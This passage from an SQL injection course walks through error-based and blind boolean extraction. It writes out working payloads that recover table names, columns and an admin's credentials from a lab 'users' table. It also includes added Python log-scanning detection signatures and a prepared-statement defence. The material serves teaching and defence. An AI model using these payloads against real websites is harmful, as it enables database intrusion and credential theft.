and (select 1 from(select count(*),concat((select concat(user,0x3a,password) from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
For the next records we modify the limit as in the previous query!
limit 1,1
And so on, depending on how many records you want to get...
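From the defender's side, an added example that is not part of the course: a small scan over web server access log lines that flags the three probe families this chapter walks through (the union select / information_schema queries of 3.2, the floor(rand(0)*2) ... group by duplicate-entry trick of 3.3, and the ascii(substring(...)) / substring(@@version) true-or-false questions of blind based), plus the lone quote-and-comment probe from 3.1. The log lines, addresses and timestamps are constructed, and the DVWA path /vulnerabilities/sqli/?id= is assumed as the target of the sample requests.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote_plus, urlparse

# Constructed access-log lines (combined-log shape, fictitious addresses and timestamps).
# The /vulnerabilities/sqli/?id= path is DVWA's; the requests replay the course's own probes.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jun/2024:10:01:02 +0000] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4120
10.0.0.5 - - [12/Jun/2024:10:01:05 +0000] "GET /vulnerabilities/sqli/?id=1%27--+&Submit=Submit HTTP/1.1" 200 4120
10.0.0.5 - - [12/Jun/2024:10:01:09 +0000] "GET /vulnerabilities/sqli/?id=0%27+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()--+&Submit=Submit HTTP/1.1" 200 4210
10.0.0.5 - - [12/Jun/2024:10:01:14 +0000] "GET /vulnerabilities/sqli/?id=1%27+and(select+1+from(select+count(*),concat((select+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+&Submit=Submit HTTP/1.1" 200 3980
10.0.0.7 - - [12/Jun/2024:10:02:01 +0000] "GET /vulnerabilities/sqli/?id=1%27+and+ascii(substring((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,1))%3E65--+&Submit=Submit HTTP/1.1" 200 4120
10.0.0.7 - - [12/Jun/2024:10:02:03 +0000] "GET /vulnerabilities/sqli/?id=1%27+and+ascii(substring((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,1))%3C104--+&Submit=Submit HTTP/1.1" 200 4120
10.0.0.9 - - [12/Jun/2024:10:03:00 +0000] "GET /vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4130
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each signature names one family from the course; the order fixes the order of the tag list.
SIGNATURES = [
    ("union_based", re.compile(r"\bunion\s+(all\s+)?select\b")),
    # floor(rand(0)*2) ... group by: the duplicate-entry trick behind every error based query in 3.3
    ("error_based", re.compile(r"floor\(\s*rand\(\s*0\s*\)\s*\*\s*2\s*\)[^;]*group\s+by")),
    # ascii(substring(...)) / substring(@@version...): the true/false questions of blind based
    ("blind_based", re.compile(r"\b(ascii|substring)\s*\(\s*(substring|@@version)")),
    ("schema_recon", re.compile(r"\binformation_schema\.(tables|columns)\b")),
    # a quote directly followed by a comment marker: the "close the query" probe from 3.1
    ("quote_comment_probe", re.compile(r"'\s*(--|#)")),
]


def classify(value):
    """Tags for one decoded parameter value, in SIGNATURES order (empty list if nothing matches)."""
    text = value.lower()
    return [tag for tag, rx in SIGNATURES if rx.search(text)]


def analyse_log(log_text):
    """One finding (client_ip, parameter_name, tags) per request parameter that matches."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; a real pipeline would count these
        query = urlparse(m["target"]).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                # parse_qs already decoded once; decoding again catches double-encoded probes
                tags = classify(unquote_plus(value))
                if tags:
                    findings.append((m["ip"], name, tags))
    return findings


def blind_probe_counts(findings):
    """Blind based probes per client. As the course notes, blind injection needs one request
    per true/false question, so the request volume from a single client is the strongest signal."""
    return dict(Counter(ip for ip, _, tags in findings if "blind_based" in tags))


if __name__ == "__main__":
    found = analyse_log(SAMPLE_LOG)
    for finding in found:
        print(finding)
    print(blind_probe_counts(found))
```

Signatures of this kind only catch the textbook spellings the course uses; a plain and 1=1 probe, for instance, matches nothing here, which is why the per-client request count is reported alongside the tags.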
3.4 Blind based
This method is met very frequently and it is very hard to exploit manually because of the time needed to build the queries.
In what follows I will show the method without carrying it to the end, because that would take a lot of time even for this small database!
To simply check whether blind based injection is present on the server, we can assume a true condition like id=1' and 1=1--+; if we get the same page, this can be a blind based injection. To be sure we try and 1=0. If the page loads without some parts of the text, because 1 is not equal to 0 (while 1 is equal to 1), we have confirmed that the server answers our questions with true or false (true if the page loads normally, false otherwise).
We ask the server whether it has DBMS version 4 (even though I know it is 5).
and substring(@@version,1,1)=4
A part of the text disappears; now we try with 5:
and substring(@@version,1,1)=5
It loads normally, which means we have version 5 of the DBMS.
If we want to get information from the database we need to understand how the server will answer our queries.
If we want to get the tables, we first need to understand the ASCII table. Why do we need ASCII? This is how blind based injection works: using the SQL ascii() function.
If we look at the ASCII table on the next page, we see that:
'a' = 97, 'A' = 65, 'g' = 103
And the examples can continue...
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),1,1))>65
We want to know whether the first letter of the first table name is greater than A (65 = ‘A’ in ASCII).
We keep increasing the value until we get the following result:
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),1,1))<104
(110 = ‘n’)
We have almost found the first letter (even though we already know it from the union-based and
error-based methods: the table name is “guestbook”)
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),1,1))=103
For the next letter we see that ‘u’ is 117, so we modify the query a little:
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),2,1))=117
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),3,1))=101
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),4,1))=115
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),5,1))=116
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),6,1))=98
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),7,1))=111
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),8,1))=111
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
0,1),9,1))=107
Now we have found “guestbook”. I will not repeat the same steps for the table “users”, which we
already know; the process is the same.
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
1,1),1,1))=117
and ascii(substring((select table_name from
information_schema.tables where table_schema=database() limit
1,1),2,1))=115
And so on until the end...
We know only the name of the table, users, and nothing else. The next part involves guessing
the columns; guessing is not 100% reliable, but for learning purposes I already know the
columns.
We assume that there is a column username, so we try to see whether it exists.
and (SELECT substring(concat(1,username),1,1) from users limit
0,1)=1
It seems that username does not exist in table users.
and (SELECT substring(concat(1,user),1,1) from users limit
0,1)=1
It works, because the web page loads normally; but what if we try password?
and (SELECT substring(concat(1,password),1,1) from users limit
0,1)=1
It works as well and now we need to find the first column of the table users (usually id or
user_id).
and (SELECT substring(concat(1,id),1,1) from users limit 0,1)=1
Unknown column 'id' in 'field list'
and (SELECT substring(concat(1,user_id),1,1) from users limit
0,1)=1
Now we need to find the administrator account and the password:
and ascii(substring((SELECT concat(user) from users where
user_id=1),1,1))=97
and ascii(substring((SELECT concat(user) from users where
user_id=1),2,1))= 100
and ascii(substring((SELECT concat(user) from users where
user_id=1),3,1))= 109
and ascii(substring((SELECT concat(user) from users where
user_id=1),4,1))= 105
and ascii(substring((SELECT concat(user) from users where
user_id=1),5,1))= 110
(admin = 97,100,109,105,110)
and ascii(substring((SELECT concat(password) from users where
user_id=1),1,1))=53
and ascii(substring((SELECT concat(password) from users where
user_id=1),2,1))=102
We continue to search until we find all the information in the password column.
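The error-based queries (floor(rand(0)*2) ... group by x) and the blind probes above (and 1=0, substring(@@version,...), ascii(substring(...)) compared against one character code per request) leave a recognisable trail in web server logs. As an added example that is not part of the original course, the following Python script applies those signatures to constructed combined-format access-log lines and flags a client that repeats true/false probes, since blind extraction needs one request per character comparison; the log lines, IP addresses and thresholds are all invented for the demonstration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original course): one normal request and
# probes of the kinds shown above, from a fictitious lab network.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=1%20and%201=0--+ HTTP/1.1" 200 4800
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=1%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=1%20and%20ascii(substring((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>65 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?id=1%20and%20ascii(substring((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=103 HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=1%20and(select%201%20from(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 5300
"""

# Combined log format: we only need the client IP, the request path and the status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Signatures of the techniques described above, applied after URL-decoding and lowercasing.
SIGNATURES = {
    "boolean_tautology": re.compile(r"\band\s+1\s*=\s*[01]\b"),
    "version_probe": re.compile(r"substring\(@@version"),
    "blind_ascii_probe": re.compile(r"ascii\(substring\("),
    "schema_enumeration": re.compile(r"information_schema\."),
    "error_based_floor_rand": re.compile(r"floor\(rand\(0\)\*2\)"),
}
BLIND_KINDS = {"boolean_tautology", "version_probe", "blind_ascii_probe"}

def classify_request(path):
    """Names of the signatures that fire on one request path (decoded so %20 and + cannot hide them)."""
    decoded = unquote_plus(path).lower()
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def analyze(log_text):
    """Per-IP summary: which signatures fired and how many true/false-style probes were seen."""
    report = defaultdict(lambda: {"hits": set(), "blind_probes": 0})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m.group("path"))
        if not hits:
            continue
        entry = report[m.group("ip")]
        entry["hits"].update(hits)
        entry["blind_probes"] += sum(1 for h in hits if h in BLIND_KINDS)
    return dict(report)

def flag_blind_extraction(report, threshold=2):
    """Clients that repeated true/false probes at least `threshold` times: the strongest blind-SQLi signal."""
    return sorted(ip for ip, entry in report.items() if entry["blind_probes"] >= threshold)
```

Real logs also carry POST bodies that this parser never sees, which is exactly why moving the parameter to POST (as the student suggests in the conclusions) hides nothing from the database.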
4. Methods of protection
http://php.net/manual/en/mysqli.quickstart.prepared-statements.php
http://php.net/manual/en/pdo.prepare.php
https://docs.oracle.com/javase/7/docs/api/java/sql/PreparedStatement.html
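The three links above all describe the same defence: prepared statements, where user input is bound as a value instead of being pasted into the SQL text. As an added example that is not from the original course or from those libraries, the following Python code uses the standard-library sqlite3 module (chosen because it runs offline) to put the vulnerable concatenation next to the prepared form and an extra integer check; the users table and its rows are constructed sample data.

```python
import sqlite3

def make_db():
    """Constructed in-memory copy of a 'users' table like the one above (sample rows, not real data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "hash-placeholder-1"), (2, "guest", "hash-placeholder-2")])
    return con

def lookup_vulnerable(con, user_id):
    """String concatenation: the input becomes part of the SQL text, so an injected
    'and'/'or' clause runs as SQL. This is the weak pattern the course exploits."""
    return con.execute("SELECT user FROM users WHERE user_id = " + user_id).fetchall()

def lookup_prepared(con, user_id):
    """Prepared statement: the input travels as a bound value and is never parsed as SQL,
    which is what the mysqli, PDO and JDBC links above provide."""
    return con.execute("SELECT user FROM users WHERE user_id = ?", (user_id,)).fetchall()

def lookup_validated(con, user_id):
    """Defence in depth: an id must be an integer, so reject anything else before it
    reaches the database, and still bind it as a parameter afterwards."""
    if not str(user_id).isdigit():
        raise ValueError("user_id must be a non-negative integer")
    return lookup_prepared(con, int(user_id))
```

With the bound parameter the whole string "1 or 1=1" is compared against the integer column and matches nothing, while the concatenated version returns every user.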
5. Conclusions
As I said earlier in this course, this type of vulnerability is very easy to exploit and exists on
many websites today.
SQLi is one of the web application vulnerabilities that can be exploited very easily on small
websites whose developers are not prepared to protect their server, web page and data from
an attack of this kind. However, not all small websites have this vulnerability, and it can
also be found on many important websites from all around the world.
A student said the following: “If we want to be protected from SQLi we need to set the parameter
on POST because it would not appear directly on the web page or in the browser URL.” To
clarify this problem, I asked the following: “Do you think this would be enough to protect you
from a possible attacker? Maybe if a script kiddie tried this, he would not succeed, but if an
experienced hacker targeted your website he would most certainly penetrate it.”
(A script kiddie is a person with little knowledge about security who uses tools made by
experienced hackers to destroy websites or servers.)
Perhaps a Web Application Firewall would stop some commands from running, such as
union, select, union select, etc., but it most certainly cannot protect you from new queries
crafted by people with experience in this domain.
As long as SQL will exist, SQLi will also exist!